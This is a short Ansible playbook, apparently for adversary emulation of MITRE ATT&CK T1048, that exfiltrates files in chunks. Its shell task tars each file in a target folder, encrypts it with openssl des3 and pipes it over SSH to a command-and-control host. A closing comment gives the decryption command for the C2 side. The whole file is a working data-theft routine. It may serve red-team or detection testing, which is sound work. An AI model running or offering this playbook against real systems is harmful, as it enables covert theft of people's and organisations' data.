
# Playbook-T1048-Chunk
- name : Exfiltration Over Alternative Protocol in chunk over time
  hosts: linux
  vars_files:
   - /opt/ansible/vars.yaml
  tasks:
    - name: Ansible check directory exists example.
      stat:
        path: "{{ exfiltration_folder }}"
      register: exfil_check
    - name: Exfiltration Over Alternative Protocol - SSH
      shell: |
        cd {{ exfiltration_folder }}
        for i in $( ls ); do tar czpf - $i | openssl des3 -salt -k {{ password_encryption }} | ssh {{ cnc_fqdn }} 'cat > {{ exfiltration_file }}-$i.tar.gz.enc'; done
       when: exfil_check.stat.exists
        
# decrypt file on cnc: openssl des3 -d -salt -k {{ password_encryption }} -in {{ exfiltration_file }}.tar.gz.enc -out {{ exfiltration_file }}tar.gz    
